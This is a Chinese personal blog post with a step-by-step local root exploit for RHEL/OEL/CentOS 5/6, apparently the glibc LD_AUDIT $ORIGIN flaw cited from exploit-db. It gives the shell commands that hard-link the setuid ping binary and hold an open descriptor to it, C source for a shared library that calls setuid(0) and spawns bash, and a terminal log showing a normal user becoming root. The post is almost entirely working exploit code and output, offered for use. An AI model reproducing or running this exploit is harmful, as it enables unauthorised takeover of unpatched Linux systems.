正德厚生,臻于至善

RHEL/OEL/CentOS 5/6普通用户提权到root

需要首先有个普通用户的shell
实验环境:OEL6.11
应该只针对RHEL/OEL/CentOS 5/6,别的版本没试

如下都是在普通用户下执行的,例如oracle用户
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit

vim /tmp/payload.c  编辑文件,写入:
void __attribute__((constructor)) init()
{
         setuid(0);
         system("/bin/bash");
}

使用gcc编译
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

使用当前的普通用户执行如下,会报错,然后你就会发现shell变成了root
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

注意最后需要在命令行中手动去执行LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3,否则不会进入root#

[root@oel6 ~]# su - oracle
[oracle@oel6 ~]$ rm -rf /tmp/exploit
[oracle@oel6 ~]$ mkdir /tmp/exploit
[oracle@oel6 ~]$ ln /bin/ping /tmp/exploit/target
[oracle@oel6 ~]$ exec 3< /tmp/exploit/target
[oracle@oel6 ~]$ rm -rf /tmp/exploit
[oracle@oel6 ~]$ cat /tmp/payload.c
void __attribute__((constructor)) init()
{
         setuid(0);
         system("/bin/bash");
}
[oracle@oel6 ~]$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
[oracle@oel6 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@oel6 ~]# whoami
root
[root@oel6 ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@oel6 ~]# 

reference:
https://www.exploit-db.com/exploits/15274
https://blog.csdn.net/mooncarp/article/details/52406990
赞(0) 打赏
未经允许不得转载:徐万新之路 » RHEL/OEL/CentOS 5/6普通用户提权到root
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

联系我们

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏